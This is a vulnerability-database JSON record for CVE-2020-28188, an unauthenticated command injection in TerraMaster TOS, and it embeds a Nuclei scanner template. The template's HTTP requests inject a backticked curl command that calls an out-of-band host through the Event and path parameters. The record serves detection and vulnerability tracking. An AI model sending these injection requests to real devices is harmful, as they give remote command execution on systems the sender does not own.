{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-28188/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-28188/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-28188/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-28188/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-28188/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-28188"},"sightings":{"href":"/api/v1/sightings/cve-2020-28188"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.96598,"kev":false,"percentile":0.99882},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-28188.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-28188\n\ninfo:\n  name: TerraMaster TOS - Unauthenticated Remote Command Execution\n  author: gy741\n  severity: critical\n  description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n  remediation: |\n    Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.\n  reference:\n    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n    - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html\n    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-28188\n    - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-28188\n    cwe-id: CWE-78\n    epss-score: 0.96598\n    epss-percentile: 0.99882\n    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: terra-master\n    product: tos\n    fofa-query: '\"terramaster\" && header=\"tos\"'\n  tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master,vkev,vuln\nvariables:\n  useragent: '{{rand_base(6)}}'\n\nhttp:\n  - raw:\n      - |\n        GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: {{useragent}}\"\n# digest: 4b0a004830460221008a602dc4ec3fc5a19616fa3db90fa062f70f48f44e7592837e8ca56f33ce2750022100cd84bf39a11aab36ffae28e5f9b91e5ff7fa5cac4f42d1f336fd923585742260:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-28188"}